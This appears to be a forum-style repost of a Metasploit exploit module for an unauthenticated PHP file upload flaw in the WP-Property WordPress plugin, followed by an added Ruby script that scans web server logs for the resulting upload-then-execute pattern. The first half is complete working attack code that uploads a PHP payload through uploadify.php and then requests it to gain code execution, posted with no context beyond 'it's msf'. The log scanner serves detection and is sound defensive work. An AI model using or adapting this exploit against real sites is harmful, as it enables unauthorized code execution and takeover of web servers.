WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
WordPress WP-Property PHP File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it; I'm saying it's msf.
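For defenders, the module above leaves a recognisable trace in web server logs: a POST to the plugin's uploadify.php followed by a request for a new .php file in the same directory. The following is an added example, not part of the original post or of Metasploit, that scans an access log for that pattern. It assumes Apache/nginx combined log format and that no other PHP file in this directory is requested in normal use; the function name, finding labels and sample log lines are constructed for illustration.

```ruby
# Added example (not part of the Metasploit module): flag the upload-then-request
# pattern in a web server access log. Sample lines are constructed.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /

SAMPLE_LOG = <<~LOG
  198.51.100.23 - - [04/Jan/2013:19:39:58 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/QwErT.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.23 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
  192.0.2.50 - - [04/Jan/2013:19:45:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/old.php HTTP/1.1" 404 0 "-" "-"
LOG

def detect_uploadify_abuse(log_text)
  uploaders = {} # client IP => true once it has made a successful upload POST
  findings = []
  log_text.each_line do |line|
    m = LOG_RE.match(line)
    next unless m
    path = m[:path][/\A[^?]*/] # drop any query string
    idx = path.downcase.index(UPLOADIFY_DIR)
    next unless idx
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    if file.casecmp?('uploadify.php')
      next unless m[:method] == 'POST' # a plain GET of the handler is low signal
      uploaders[m[:ip]] = true if m[:status] == '200'
      type = :upload_post
    elsif file =~ /\.(php\d?|phtml)\z/i
      # Assumption: any other PHP file here is unexpected; allowlist known-good names.
      type = uploaders[m[:ip]] ? :exec_after_upload : :php_in_uploadify_dir
    else
      next
    end
    findings << { ip: m[:ip], ts: m[:ts], type: type, path: path, status: m[:status].to_i }
  end
  findings
end

detect_uploadify_abuse(SAMPLE_LOG).each do |f|
  puts format('%-22s %-15s %d %s', f[:type], f[:ip], f[:status], f[:path])
end
```

The upload POST is the more reliable signal, because the `folder` form field lets the client name the destination directory, so uploaded files need not land next to uploadify.php.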